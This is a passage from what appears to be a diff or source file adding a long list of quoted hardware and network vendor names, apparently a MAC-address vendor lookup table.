Wireless", + "Stratacom", + "Jasco Corporation", + "Tronix Product Development", + "Ohkura Electric Co., Ltd.", + "Abit Corporation", + "Solectek Corporation", + "Marben Communication Systems", + "Nupon Computing Corp.", + "Myco Electronics", + "Somelec", + "Cipher Systems, Inc.", + "Elonex Plc", + "Us Army Electronic", + "Starlight Networks, Inc.", + "Network Controls Int'natl Inc.", + "Sybus Corporation", + "Clinicomp Intl.", + "Ani Communications Inc.", + "Integrated Engineering B. V.", + "Exicom Australia Pty. Ltd", + "Comtree Technology Corporation", + "Raster Image Processing System", + "Mennen Medical Inc.", + "Burr-Brown", + "Seh Computertechnik Gmbh", + "Advanced Technical Solutions", + "Hal Computer Systems Inc.", + "Martin Marietta Corporation", + "I-Cubed Limited", + "Dickens Data Systems", + "Olympus Image Systems, Inc.", + "Plexcom, Inc.", + "Memotec, Inc.", + "Wiesemann & Theis Gmbh", + "Hypertec Pty Ltd.", + "Dsc Communication Corp.", + "Milan Technology Corporation", + "Alliant Computer Systems Corp.", + "Net-Source, Inc.", + "E-Systems, Inc./Garland Div.", + "American Megatrends Inc.", + "Raster Graphics", + "Bizerba-Werke Wilheim Kraut", + "Marner International, Inc.", + "Symplex Communications", + "Gage Talker Corp.", + "Talent Electric Incorporated", + "Ocean Office Automation Ltd.", + "Fibernet Research, Inc.", + "Digital Communications", + "Applied Computing Devices", + "Mobius Technologies, Inc.", + "Maxpeed", + "Toyo Denki Seizo K.k.", + "Ast Research, Inc.", + "Datacom Technologies", + "Sampo Technology Corporation", + "Bustek Corporation", + "Xyron Corporation", + "Silex Technology, Inc.", + "Tulip Computers Internat'l B.v", + "Southern Pacific Ltd.", + "Rational", + "Fibermux", + "National Datacomm Corporation", + "Ironics, Incorporated", + "Wind River Systems", + "Fujikura Ltd.", + "Computone Systems", + "Technology Works, Inc.", + "Apex Computer Company", + "Fermilab", + "Test Systems & Simulations Inc", + "Integrated Inference Machines", + "Penril Datacomm", + "Parsytec Gmbh", + "Iq Technologies, Inc.", + "Novus Networks Ltd", + "Pro-Log", + "Antlow Communications, Ltd.", + "Computer Peripherals, Inc.", + "Kalpana, Inc.", + "John Fluke Manufacturing Co.", + "Alcatel Canada Inc.", + "Cumulus Corporatiion", + "Talaris Systems, Inc.", + "Apricot Computers, Ltd", + "Microsage Computer Systems Inc", + "Pure Data Ltd.", + "Applied Dynamics International", + "Logic Modeling Corporation", + "Telit Wireless Solutions GmbH", + "Vosswinkel F.u.", + "Kimtron Corporation", + "Telsist Industria Electronica", + "Radisys Corporation", + "Castle Rock Computing", + "Logicraft, Inc.", + "Datapoint Corporation", + "Bell Technologies", + "Network Resources Corporation", + "Visual Technology Inc.", + "Datability Software Sys. Inc.", + "Quadram Corp.", + "Timeplex Inc.", + "Aptor Produits De Comm Indust", + "Rc Computer A/S", + "Icl Data Oy", + "Imlogix, Division Of Genesys", + "Cray Communications A/S", + "Kinetics", + "Seiko Instruments Inc.", + "Siecor Corporation", + "Mcdonnell Douglas Computer Sys", + "Symmetric Computer Systems", + "Chromatics Inc", + "Hellige GMBH", + "Concord Communications Inc", + "Star Gate Technologies", + "Labtam Limited", + "SysKonnect GmbH", + "Adra Systems Inc.", + "Abb Industrial Systems Ab", + "Webster Computer Corporation", + "Micrognosis International", + "Chyron Corporation", + "The Nti Group", + "Nippon Telegraph & Telephone", + "10Net Communications/Dca", + "Nbi Inc.", + "Mosaic Technologies Inc.", + "Exxon", + "Jarogate Ltd.", + "Saber Technology Corp.", + "Systems Concepts", + "Triumph-Adler Ag", + "Univation", + "Excelan", + "Krupp Atlas Electronik Gmbh", + "Olivetti Telecomm Spa (Olteco)", + "A/S Mycron", + "Bolt Beranek And Newman Inc.", + "Locamation B.v.", + "Planning Research Corp.", + "InHand Networks, INC.", + "Cavli Inc.", + "cheilelectric", + "Ingenico Terminals Sas", + "Siemens Energy Global GmbH & Co.KG - GT PRM", + "mercury corperation", + "Interroll Software & Electronics GmbH", + "JWIPC Technology Co.,Ltd.", + "Matrix Comsec Private Limited", + "Druid Software", + "Habana Labs LTD.", + "Tarmoc Network LTD", + "World WLAN Application Alliance", + "Gla Electronics Pvt Ltd", + "Guangzhou Mudi Information Technology Co., Ltd", + "IEI Integration Corp.", + "Cloudflare, Inc.", + "Hitachi Energy USA Inc.", + "awayfrom", + "CHeKT Inc.", + "Avm Electronics Pte Ltd", + "Stereotaxis, Inc.", + "Mse Co.,Ltd.", + "Shanghai Tricheer Technology Co.,Ltd.", + "Shenzhen Grandsun Electronic Co.,Ltd.", + "SignalFire Telemetry", + "Eyedro Green Solutions Inc.", + "Zhong Ge Smart Technology Co., Ltd.", + "WAC Lighting", + "Shenzhen MinewSemi Co.,LTD.", + "Zhejiang Cainiao Supply Chain Management Co., Ltd", + "Copeland - Transportation Solutions ApS", + "Areus GmbH", + "EVBox BV", + "Shenzhen Uascent Technology Co.,Ltd", + "Feitian Technologies Co., Ltd", + "Guangdong Seneasy Intelligent Technology Co., Ltd.", + "Shenzhen Stellamore Technology Co.,Ltd", + "Acres Manufacturing", + "Raytron Photonics Co.,Ltd.", + "Taiwan Digital Streaming Co.", + "SKODA DIGITAL s.r.o.", + "Ispec", + "Shenzhen Fangcheng Baiyi Technology Co., Ltd.", + "Agnigate Technologies Private Limited", + "DASAN Newtork Solutions", + "Nanowell Info Tech Co., Limited", + "Markone technology Co., Ltd.", + "leapio", + "Skychers Creations ShenZhen Limited", + "HOLOEYE Photonics AG", + "Medtronic CRM", + "Shanghai Kenmyond Industrial Network Equipment Co., Ltd", + "Calian Advanced Technologies", + "FAXedge Technologies, LLC", + "Wuxi Ranke Technology Co., Ltd.", + "PROCITEC GmbH", + "Microchip Technologies Inc", + "Beijing Coolshark Technology Co.,Ltd.", + "AVIRE Trading Limited", + "Keheng Information Industry Co., Ltd.", + "Onward Brands", + "JiangSu Fulian Communication Technology Co., Ltd", + "Shenzhen Qianfenyi Intelligent Technology Co.,LTD", + "Beijing Cheering Networks Technology Co.,Ltd.", + "Info Fiber Solutions Pvt Ltd", + "Qbic Communications Dmcc", + "Copeland LP", + "Motorola(Wuhan) Mobility Technologies Communication Co.,Ltd", + "Skylark Electronics Pvt Ltd", + "Teclink", + "Pronyx Trading Llc", + "Hanwha Vision Vietnam Company Limited", + "Novaon", + "Shenzhen Techwinsemi Technology Co., Ltd.", + "VAST Data Inc", + "Optomind Inc.", + "WIKO Terminal Technology (Dongguan) Co., Ltd.", + "Interdisciplinary Consulting Corporation", + "TelHi Corporation", + "Miba Battery Systems GmbH", + "MAS Elektronik AG", + "LS Mecapion", + "Shenzhen Micipc Technology Co.,Ltd", + "Safemo Pte. Ltd.", + "Shenzhen Wenxun Technology Co.,Ltd", + "Senbiosys SA", + "Vention", + "Uneeviu Technologies India Private Limited", + "Beijing gpthink technology co.,LTD.", + "Shenzhen Gotron electronic CO.,LTD", + "iMin Technology Pte. Ltd.", + "Zhejiang Bodyguard Electronic Co., Ltd", + "Shenzhen V-Link Technology CO., LTD.", + "Shenzhen Quanxing Technology Co., Ltd", + "Weiser", + "Technology Innovation Institute", + "Brodersen A/S", + "Forvia", + "Kwikset", + "Koganei Corporation", + "Shenzhen Ultraeasy Technology Co Ltd", + "Moxa.Inc", + "TimeWatch Infocom Pvt. Ltd.", + "Ganatechwin", + "Goki Pty Ltd", + "Max Weishaupt SE", + "Wiwynn Technology Service Malaysia", + "Kokusai Electric Corporation", + "Axino Solutions AG", + "Shenzhen Ai-Thinker Technology Co.,Ltd", + "Highway 9 Networks, Inc.", + "United Memory Technology (Jiangsu) Limited", + "Fsas Technologies Inc.", + "Nextracker, Inc.", + "Shen Zhen Ktc Technology.,Ltd.", + "Launch Tech Co., Ltd.", + "Hse Smart", + "shenzhen AZW Technology(Group) Co.,Ltd", + "Digital Control Technology Limited", + "WuLu Networks Pty Ltd", + "Visteon Portuguesa, Ltd", + "Sensear Pty Ltd", + "Qingdao Zhipai Information Technology Co., Ltd.", + "Shanghai SYH Technology CO.,LTD", + "BuildJet, Inc.", + "Bluebank Communication Technology Co.,Ltd.", + "SG Armaturen AS", + "JOYNEXT GmbH", + "KOSTAL (Shanghai) Management Co., Ltd.", + "Anhui Xiangyao New Energy Technology Co., Ltd.", + "RAI Institute", + "Hangzhou Zhongxinhui lntelligent Technology Co.,Ltd.", + "Hengji Jiaye (Hangzhou) Technology Co., Ltd", + "Chipsea Technologies (Shenzhen) Crop.", + "Suzhou K-Hiragawa Electronic Technology Co.,Ltd", + "Telin Semiconductor (Wuhan) Co.,Ltd", + "Shengzhen Gongjin Electronics", + "Shenzhen Goodocom lnformation Technology Co.,Ltd.", + "Shenzhen Melon Electronics Co.,Ltd", + "Shenzhen HippStor Technology Co., Ltd", + "Shenzhen Vipstech Co., Ltd", + "Qingdao Dayu Dance Digital Technology Co.,Ltd", + "Scopus International Pvt. Ltd.", + "NoTraffic", + "Calantec GmbH", + "Movella Technologies B.V.", + "Concurrent Technologies Ltd.", + "Proxmox Server Solutions GmbH", + "Murrelektronik GmbH", + "Rtk-Technologies, Llc", + "SKAIChips", + "Xytronix Research & Design, Inc.", + "xFusion Digital Technologies Co.,Ltd.", + "Vuzix Corporation", + "AgiTech Distribution Limited - Linki", + "Nova Labs", + "Focusai Corp", + "Guangdong Taiying Technology Co.,Ltd", + "Shenzhen Jinlangxin Technology Co., Ltd", + "Shenzhen E-Life Intelligence Technology Co.,Ltd.", + "Rolling Wireless S.a.r.l. Luxembourg", + "Hisilicon Technologies Co., Ltd", + "SALZ Automation GmbH", + "Blyott NV", + "Viasat, Incorporated", + "V&G Information System Co.,Ltd", + "Marinesync Corp", + "HOSIN Global Electronics Co., Ltd.", + "HANA Electronics", + "Yamashita Systems Corp.", + "shenzhen scodeno technology co., Ltd.", + "Ledworks SRL", + "Keltron IOT Corp.", + "Signalinks Communication Technology Co., Ltd", + "Onda TLC Italia S.r.l.", + "Npo Rtt Llc", + "Huizhou BYD Electronic Co., Ltd.", + "Xiaoniu network technology (Shanghai) Co., Ltd.", + "Exascend, Inc.", + "Shenzhen Cudy Technology Co., Ltd.", + "EnOcean Edge Inc.", + "AIxLink", + "Sigma Bilisim Sist. Tekn. Elk. Enj. ve San. D??. Tic. Ltd. ?ti.", + "Anda Telecom Pvt Ltd", + "tiko Energy Solutions AG", + "koreabts", + "Chengdu BeiZhongWangXin Technology Co.Ltd", + "Kempower Oyj", + "Huizhou Speed Wireless Technology Co.,Ltd", + "Imd", + "Elbit Systems Deutschland GmbH & Co. KG", + "Shenzhen Dttek Technology Co., Ltd.", + "Toyo Seisakusho Kaisha, Limited", + "Liangang Optoelectronic Technology CO., Ltd.", + "Digiboard Eletronica da Amazonia Ltda", + "Shenzhen Rinocloud Technology Co.,Ltd.", + "Shenzhen Chengqian Information Technology Co., Ltd", + "Wilk Elektronik S.A.", + "WISDRI (wuhan) Automation Company Limited", + "MARKIN co., Ltd.", + "Micronview Limited Liability Company", + "Humane", + "Leo Bodnar Electronics Ltd", + "Puwell Cloud Tech Limited", + "Beijing Wiseasy Technology Co.,Ltd.", + "Guizhou Huaxin Information Technology Co., Ltd.", + "Novitec Co., Ltd.", + "Lockin Technology(Beijing) Co.,Ltd.", + "Katena Computing Technologies", + "Zaram Technology. Inc.", + "TD Tech", + "DESSMANN (China) Machinery & Electronic Co., Ltd", + "Alta Networks", + "Newseason", + "Beijing Leagrid Technology Co.,Ltd.", + "Shenzhen Topwise Communication Co.,Ltd", + "Ningbo Sunvot Technology Co.,Ltd", + "Shenzhen Mindray Animal Medical Technology Co.,LTD", + "Inspur Communication Technology Co.,Ltd.", + "Itectra A/S", + "Hangzhou Microimage Software Co., Ltd", + "Itibia Technologies", + "Fdsys", + "iRhythm Technologies, Inc.", + "Beyonics Technology Electronic (Changshu) Co., Ltd", + "Xiamen Leelen Technology Co., Ltd", + "Shenzhen All-Smartlink Technology Co.,Ltd.", + "NewRadio Technologies Co. , Ltd.", + "Inyuan Technology Inc.", + "Ducati Sistemi", + "Oxit, LLC", + "Shenzhen Sanmu Communication Technology Co., Ltd", + "Jinan USR IOT Technology Limited", + "COMTTI Intelligent Technology(Shenzhen) Co., Ltd.", + "Yinuolink Co.,Ltd", + "Kinetic Technologies", + "Photon Sail Technologies", + "Beijing Wide Technology Co.,Ltd", + "Qiao Information Technology (Zhengzhou) Co., Ltd.", + "Suzhou Mobydata Smart System Co.,Ltd.", + "ADC Automotive Distance Control System GmbH", + "Seakeeper, Inc.", + "GOAL Co., Ltd.", + "AX Technologies", + "Shenzhen z-router Technology Co., Ltd", + "Nixvue Systems Pte Ltd", + "Digital Art System", + "Magnetar Technology Shenzhen Co., LTD.", + "XiNCOM Corp.", + "Zepcam B.V.", + "Shenzhen juduoping Technology Co.,Ltd", + "The Goodyear Tire & Rubber Company", + "Polysense (Beijing) Technologies Co. Ltd", + "L-3 Communications Infrared Products", + "Petabit Scale, Inc.", + "Oray.com co., LTD.", + "Shanghai Infinity Wireless Technologies Co.,Ltd.", + "Sonova Consumer Hearing GmbH", + "Quest Engineering & Development", + "Shenzhen Elebao Technology Co., Ltd", + "Afe Computers Ltd.", + "M2Motive Technology Inc.", + "shenzhen UDD Technologies,co.,Ltd", + "Zhongguancun Xinhaizeyou Technology Co.,Ltd", + "Demant A/S", + "FiRa Consortium", + "Graphiant Inc", + "Technicolor CH USA Inc for Telus", + "Tkh Security,S.l.u.", + "Ukg", + "LIZN ApS", + "guangdong kesheng zhixun technology", + "Saab Sensis Corporation", + "Shanghai Mo xiang Network Technology CO.,ltd", + "ProDVX Europe B.V.", + "ACL Airshop BV", + "Britania Eletrônicos S.A.", + "JSC IB Reform", + "Nebula Matrix", + "Sichuan Changhong Network Technologies Co., Ltd.", + "Agatel Ltd", + "In One Smart Technology(H,K,)Limited", + "Guangzhou Lango Electronics Technology Co.,Ltd.", + "Teletics Inc.", + "Navtech Pte Ltd", + "Beijing Royaltech Co.,Ltd", + "EdgeQ", + "Gearlinx Pty Ltd", + "Occuspace", + "Airpo Networks Technology Co.,Ltd.", + "Vorteks ED", + "Zhongshan K-mate General Electronics Co.,Ltd", + "COOCAA Network Technology CO.,TD.", + "Shenzhen Candour Co., Ltd.", + "Hyundai Kefico", + "ShenZhen Qualmesh Technology Co.,Ltd.", + "Qotom", + "NDR Co.,LTD.", + "SharkNinja", + "Woan Technology (Shenzhen) Co., Ltd.", + "Komatsu Ltd.", + "Wha Yu Industrial Co., Ltd.", + "Beijing Jingling Information System Technology Co., Ltd.", + "Fujitsu Client Computing Limited", + "KEMAS GmbH", + "Shenzhen Fsan Intelligent Technology Co.,Ltd", + "Shenzhen Dazoo Technologies CO.,Ltd", + "OnTarget Technologies, Inc", + "Northstar Engineering Ltd.", + "Connect Srl", + "Az-Technology Sdn Bhd", + "Wuhan IPG Technologies Co., Ltd.", + "BKM-Micronic Richtfunkanlagen GmbH", + "Innovation Sound Technology Co., LTD.", + "EMU Electronic AG", + "Joint Stock Company Research Instinite Masshtab", + "ESYLUX GmbH", + "Ratp", + "Cub Elecparts Inc.", + "Kontron Europe GmbH", + "Shenzhen IP3 Century Intelligent Technology CO.,Ltd", + "Wellysis Corp.", + "INTARSO GmbH", + "Nanjing Baihezhengliu Technology Co., Ltd", + "Guangdong Transtek Medical Electronics CO.,Ltd", + "Autonomic Controls, Inc.", + "Greenliant", + "Domo Tactical Communications", + "WonderSound Technology Co., Ltd", + "Beijing Perfectek Technologies Co., Ltd.", + "New Ryatek", + "Shenzhen HC-WLAN Technology Co.,Ltd", + "Kastle Systems", + "Virgilant Technologies Ltd.", + "Shenzhen Yunding Information Technology Co.,Ltd", + "Zahner-Elektrik Ingeborg Zahner-Schiller GmbH & Co. KG.", + "Hailo Digital Hub GmbH & Co. KG", + "Logitech (China) Technology Co., Ltd", + "ScreenBeam, Inc.", + "Metis Co., Ltd.", + "Ningbo Sanxing Medical Electric Co.,Ltd", + "Unicom Vsens Telecommunications Co., Ltd.", + "Radwin", + "Ubiik", + "Dts Elektronik San. Tic. Ltd. Sti.", + "Shenzhen Sworix Techonlogy Co., Ltd", + "Hangzhou Huamu Technology Co.,Ltd.", + "TomTom International BV", + "Boditech Med", + "HBC-radiomatic", + "Opple Lighting Co., Ltd", + "Hyeco Smart Tech Co.,Ltd", + "Shenzhen Kaifa Technology Co.,Ltd.", + "University of Oklahoma", + "ITE Tech Inc", + "Shenzhen Sunwoda intelligent hardware Co.,Ltd", + "JRC Mobility Inc.", + "TELDIX GmbH", + "Xovis AG", + "R3 Solutions GmbH", + "Poly", + "Guangzhou Doctorpai Education & Technology Co.,Ltd", + "Chengdu Higon Integrated Circuit Design Co,. Ltd.", + "Rf-Lambda Usa Inc.", + "Mobile Action Technology Inc.", + "Arris", + "ASMedia Technology Inc.", + "Shenzhen Yunji Intelligent Technology Co.,Ltd", + "Repeatit AB", + "ifm electronic gmbh", + "Lascar Electronics Ltd", + "Sterlite Technologies Limited", + "Yohana", + "Obara Korea", + "Sensaio Pte Ltd", + "Ragile Networks Inc.", + "PentronicAB", + "UserGate Ltd.", + "Jaewoncnc", + "Guangzhou limee technology co.,LTD", + "Rhombus Systems", + "Beautiful Card Corporation", + "Teno Network Technologies Company Limited", + "OleumTech Corporation", + "Innophase Inc.", + "3PAR data", + "Cedes Ag", + "Creotech Instruments S.A.", + "Shenzhen Comnect Technology Co.,LTD", + "Guangzhou Sageran Technology Co., Ltd.", + "Cloudwalk Technology Co.,Ltd", + "PowerLink Technology Inc.", + "shenzhen RAKwireless technology Co.,Ltd", + "SimpliSafe", + "lignex1", + "Ontrol A.S.", + "Novacomm Ltda", + "Sprecher Automation GmbH", + "Hong Kong Middleware Technology Limited", + "Aetheros", + "Propulsion systems", + "EVUlution AG", + "Hyundai Autoever Corp.", + "Kimball Electronics Group, LLC", + "Lava international limited", + "FACTORY FIVE Corporation", + "Greenpacket Berhad, Taiwan", + "360 AI Technology Co.Ltd", + "Trane Technologies", + "BRECIS Communications Corporation", + "Wandel And Goltermann", + "Sense Things Japan INC.", + "EEP Elektro-Elektronik Pranjic GmbH", + "Sanshin Electronics Co.,Ltd.", + "Glory, Ltd.", + "Panasonic Corporation of North America", + "B&Tech System Inc.", + "Nippon Printer Engineering", + "Ellu Company 2019 SL", + "ZETLAB Company", + "Hunan Voc Acoustics Technology Co., Ltd.", + "GITSN, Inc.", + "Aeonsemi, Inc.", + "MSA Innovation", + "Carlo Gavazzi Ltd", + "NXP India Private Limited", + "Farlink Technology Limited", + "Adnacom Inc.", + "Shenzhen Reecam Tech.Ltd.", + "Firewalla Inc", + "C8 MediSensors, Inc.", + "Topfield Co., Ltd", + "Microfan B.V.", + "Global Cache", + "ParanTek Inc.", + "BrainCo", + "Takumi Japan Ltd", + "Tianjin Hualai Technology Co., Ltd", + "ShenZhen Selenview Digital Technology Co.,Ltd", + "Beijing Tricolor Technology Co., Ltd", + "Ztron Technology Limited", + "Sunstar Communication Technology Co., Ltd", + "Hoval Aktiengesellschaft", + "Zykronix", + "Stratacache", + "Atol Llc", + "Guangzhou Xianyou Intelligent Technogoly CO., LTD", + "NETINT Technologies Inc.", + "Athom B.V.", + "ELL-IoT Inc", + "Critical IO, LLC", + "Nanjing Youkuo Electric Technology Co., Ltd", + "Shenzhen Yanray Technology Co.,Ltd", + "Bionix Supplychain Technologies Slu", + "HRCP Research and Development Partnership", + "Shanghai Smart System Technology Co., Ltd", + "Primex Wireless", + "Nanjing Ztlink Network Technology Co.,Ltd", + "ASSA ABLOY Korea Co., Ltd Unilock", + "GL Technologies (Hong Kong) Limited", + "Megatronix (Beijing) Technology Co., Ltd.", + "Qingdao Hisense Electronics Co.,Ltd.", + "4DReplay, Inc", + "Ola Sense Inc", + "NANOWAVE Technologies Inc.", + "Jiangsu Hengxin Technology Co.,Ltd.", + "Dbg Holdings Limited", + "Optical Network Video Technologies (Shenzhen) Co., Ltd.", + "Allied-telesisK.K.", + "Targus US LLC", + "Shenzhen Ceres Technology Co., Ltd.", + "Creatz inc.", + "Coral Telecom Limited", + "Cetia", + "Bee Computing (HK) Limited", + "Wuhan Maritime Communication Research Institute", + "LEA Professional", + "Testop Co.,Ltd.", + "Plasma Cloud Limited", + "Dedicated Micros Malta LTD", + "Ruroc LTD", + "ULVAC,Inc.", + "Fuzhou Teraway Information Technology Co.,Ltd", + "Deeptrack S.l.u.", + "Parta Networks", + "Xaptum, Inc.", + "Shenzhen Horn Audio Co.,Ltd.", + "Nanjing dianyan electric power automation co. LTD", + "DIEHL Connectivity Solutions", + "NZXT Corp. Ltd.", + "MedHab LLC", + "Beijing XiaoLu technology co. LTD", + "OWLink Technology Inc", + "RAID Incorporated", + "Skorpios Technologies", + "Tecnobit", + "Hanna Instruments, Inc.", + "duagon AG", + "Shandong Zhongan Technology Co., Ltd.", + "Wavetel Technology Limited", + "Shenzhen Zhongke United Communication Technology", + "LeiShen Intelligent System Co.Ltd", + "Oxygen Broadband s.a.", + "Xiamen Yaxon Network Co., Ltd.", + "Brita GmbH", + "Xac Automation Corp.", + "Shinwa industries(China) ltd.", + "iDruide", + "Jabil Circuit Italia S.r.l", + "Shenzhen Mainuoke Electronics Co., Ltd", + "Zliide Technologies ApS", + "SEW Eurodrive GmbH & Co. KG", + "Qingdao Haier Multimedia Limited.", + "Quanta Storage Inc.", + "IT Telecom Co., Ltd.", + "Nexell", + "The Parvus Corporation", + "Pharos Co.Ltd", + "Thomas-Krenn.AG", + "Grayhill, Inc", + "Selve GmbH & Co. KG", + "Infranor Sas", + "Cctv Neotech", + "Ademco Smart Homes Technology(Tianjin)Co.,Ltd.", + "Rossma", + "barox Kommunikation GmbH", + "BAE Systems, Inc", + "Belden India Private Limited", + "Ample Systems Inc.", + "Versa Networks", + "Suzhou Pairlink Network Technology", + "NX Technologies", + "Toshiba Client Solutions Co., Ltd.", + "DisplayLink (UK) Ltd", + "ACOMA Medical Industry Co,. Ltd.", + "Skydio Inc.", + "Kce", + "Eko Devices, Inc.", + "PSTec", + "JLG Industries, Inc.", + "Insigma Inc", + "Speaker Electronic(Jiashan) Co.,Ltd", + "AuVerte", + "Shenzhen Wolck Network Product Co.,LTD", + "Billionton Systems, Inc.", + "JiangSu Joyque Information Industry Co.,Ltd", + "Baraja Pty. Ltd.", + "optilink networks pvt ltd", + "Innotube, Inc.", + "Netafim L", + "The Refined Industry Company Limited", + "Siemens AG, Automations & Drives,", + "Shenzhen Amediatech Technology Co., Ltd.", + "Honeywell Connected Building", + "Shen Zhen Da Xia Long Que Technology Co.,Ltd", + "Technologic Systems", + "Ningbo Deli Kebei Technology Co.LTD", + "iBASE Gaming Inc", + "Shenzhen WYC Technology Co., Ltd.", + "Fourthtrack Systems", + "Startel", + "Shenzhen JustLink Technology Co., LTD", + "Hot Pepper, Inc.", + "EM-Tech", + "evon GmbH", + "Viwone", + "Palit Microsystems, Ltd", + "MTG Co., Ltd.", + "Netquest Corporation", + "Shanghai Siflower Communication Technology Co., Ltd", + "Oerlikon Textile Gmbh&Co.KG", + "Maas International BV", + "Intellithings Ltd.", + "Qingping Electronics (Suzhou) Co., Ltd", + "IC Realtime LLC", + "Scan Coin Ab", + "Scan Engineering Telecom", + "Intai Technology Corp.", + "Youngkook Electronics Co.,Ltd", + "Hajen", + "James Czekaj", + "Silicon Motion, Inc.", + "DEPO Electronics Ltd", + "Bosch Car Multimedia (Wuhu) Co. Ltd.", + "VostroNet", + "Xlab Co.,Ltd", + "Muller Services", + "Shanghai Flexem Technology Co.,Ltd.", + "Modular Computing Technologies", + "Dunkermotoren GmbH", + "Escort, Inc.", + "Intellion AG", + "QDIQO Sp. z o.o.", + "WiFiSong", + "German Autolabs", + "ABC(XiSheng) Electronics Co.,Ltd", + "Hu&Co", + "Siemens AG Austria", + "Universal Electric Corporation", + "China Broadband Wireless IP Standard group(ChinaBWIPS)", + "Post CH AG", + "Xlnt Designs Inc.", + "Elvaco AB", + "Konze System Technology Co.,Ltd.", + "Yelatma Instrument Making Enterprise, JSC", + "Oneac Corporation", + "Shenzhen Xiaoqi Intelligent Technology Co., Ltd.", + "Ningbo Forfan technology Co., LTD", + "Moda-InnoChips", + "Jubixcoltd", + "Guangdong Uniteddata Holding Group Co., Ltd.", + "Panasonic do Brasil Limitada", + "Gifa", + "Idaho National Laboratory", + "Hangzhou Dianyixia Communication Technology Co. Ltd.", + "Hangzhou Ruiying technology co., LTD", + "SYSDINE Co., Ltd.", + "FirmTek, LLC", + "Phantom Intelligence", + "Senet Inc", + "AltoBeam (Xiamen) Technology Ltd, Co.", + "Shenzhen Lantech Electronics Co., Ltd.", + "Henge Docks LLC", + "Qingdao Hisense Mobile Communication Technology Co,Ltd", + "Meditech Kft", + "Sectronic", + "currentoptronics Pvt.Ltd", + "Plexonics Technologies LImited", + "Pink Nectarine Health AB", + "Longnan Junya Digital Technology Co. Ltd.", + "Evoluzn Inc.", + "RuiXingHengFang Network (Shenzhen) Co.,Ltd", + "Mesotic Sas", + "DIVUS GmbH", + "Adamson Systems Engineering", + "Somfy", + "Universal Flow Monitors, Inc.", + "port industrial automation GmbH", + "Automotive Data Solutions", + "Xingfei (H.k)Limited", + "Ross Video Limited", + "Syszone Co., Ltd.", + "Radio Datacom LLC", + "NSD Corporation", + "Agm Group Limited", + "Wyler AG", + "Shin Wang Tech.", + "7Hugs Labs", + "East Coast Datacom, Inc.", + "Sunsea Telecommunications Co.,Ltd.", + "Kakao Corp", + "Magic Intelligence Technology Limited", + "Shenzhen xeme Communication Co., Ltd.", + "Mini-Cam Limited", + "LGS Innovations, LLC", + "Zhejiang Moorgen Intelligence Technology Co., Ltd", + "silicon valley immigration service", + "Tianjin Henxinhuifeng Technology Co.,Ltd.", + "Robert Bosch Engineering and Business Solutions pvt. Ltd.", + "JBL GmbH & Co. KG", + "TechniSat Digital GmbH Daun", + "Equitech Industrial(DongGuan)Co.,Ltd", + "Aday Technology Inc", + "Vrcom, Inc.", + "Gad Line, Ltd.", + "Isung Co.,Ltd", + "Jupiter Systems, Inc.", + "Biostar Microtech international corp.", + "STABILO International GmbH", + "Velankani Electronics Pvt. Ltd.", + "Cyclotronics Power Concepts, Inc", + "Annapolis Micro Systems, Inc.", + "Cara Systems", + "Senetas Corporation Ltd", + "Beijing Sensoro Technology Co.,Ltd.", + "AUDIO MOBIL Elektronik GmbH", + "Sichuan iLink Technology Co., Ltd.", + "Innocent Technology Co., Ltd.", + "Guangzhou Winsound Information Technology Co.,Ltd.", + "Zhejiang Xinzailing Technology co., ltd", + "Avnet Silica", + "Jabil Circuit Penang", + "June Life Inc", + "Sony Video & Sound Products Inc.", + "Alarm.com", + "Dalian Lamba Technology Co.,Ltd", + "Oculus VR, LLC", + "WiBotic Inc.", + "Facebook Inc", + "CenturyLink", + "NGD Systems, Inc.", + "Owl Labs", + "Lars Thrane A/S", + "Shenzhen Pante Electronics Technology Co., Ltd", + "Ateme", + "Pen Generations, Inc.", + "Shanghai IUV Software Development Co. Ltd", + "Noccela Oy", + "Konten Networks Inc.", + "Hunantv.com Interactive Entertainment Media Co.,Ltd.", + "Tegile Systems", + "OpenRTLS Group", + "Monico Monitoring, Inc.", + "Shenzhen Tozed Technologies Co.,Ltd.", + "Nephos Inc", + "SensorTec-Canada", + "AIRSOUND Inc.", + "Snap, Inc.", + "Garland Technology", + "Ventia Utility Services", + "TP Vision Belgium NV", + "Niagara Video Corporation", + "Nishiyama Industry Co.,LTD.", + "Welcat Inc", + "GuangZhou CREATOR Technology Co.,Ltd.(CHINA)", + "MEKRA Lang GmbH & Co. KG", + "Zicon Technology Corp.", + "Senseit", + "ICG NETWORKS CO.,ltd", + "World Wide Packets", + "Sow Cheng Technology Co. Ltd.", + "Shenzhen Techtion Electronics Co., Ltd.", + "Senient Systems LTD", + "Samsin Innotec", + "Personal Media Corp.", + "Cash Systemes Industrie", + "ConferTech International", + "i4C Innovations", + "ShanDong Domor Intelligent S&T CO.,Ltd", + "Hagenuk Marinekommunikation GmbH", + "International Datacasting Corporation", + "Oregano Systems - Design & Consulting GmbH", + "Shenzhen Along Investment Co.,Ltd", + "PRIMA Research And Production Enterprise Ltd.", + "Beijing IQIYI Science & Technology Co., Ltd.", + "Welgate Co., Ltd.", + "i3 International Inc.", + "OutSmart Power Systems, Inc.", + "Zhongshan Readboy Electronics Co.,Ltd", + "Amgen U.S.A. Inc.", + "Angler Labs Inc", + "Zhejiang Winsight Technology CO.,LTD", + "BCTech", + "Drust", + "PRO-VISION, Inc.", + "Unetconvergence Co., Ltd.", + "SmartCap Technologies", + "Semaphore Communications Corp.", + "Sensaphone", + "CENTRAL ENGINEERING co.,ltd.", + "ThyssenKrupp Elevators (Shanghai) Co.,Ltd", + "Merten GmbH&CoKG", + "Horsch Elektronik Ag", + "O-Sung Telecom Co., Ltd.", + "Korea Image Technology Co., Ltd", + "Probedigital Co.,Ltd", + "Shooter Detection Systems", + "Shanghai B-star Technology Co.,Ltd.", + "Befs co,. ltd", + "Toshiba Toko Meter Systems Co., LTD.", + "Zencheer Communication Technology Co., Ltd.", + "ConteXtream Ltd", + "Shenzhen Xin KingBrand enterprises Co.,Ltd", + "EMH Energiemesstechnik GmbH", + "Lundinova AB", + "MobileCompia", + "Hansol Technics Co., Ltd.", + "Meshcom Technologies Inc.", + "Lynxspring, Incl.", + "Kumalift Co., Ltd.", + "Pason Systems", + "IntegraOptics", + "Asahi Net, Inc.", + "Guangdong Coagent Electronics S&T Co.,Ltd.", + "Shenzhen RF Technology Co., Ltd", + "mediola - connected living AG", + "Venntis, LLC", + "Shenzhen Liown Electronics Co.,Ltd.", + "Voltaire", + "UMB Communications Co., Ltd.", + "Shenzhen Netcom Electronics Co.,Ltd", + "Kraftway Corporation PLC", + "Bulat Llc", + "Zavio Inc.", + "Shenzhen Aikede Technology Co., Ltd", + 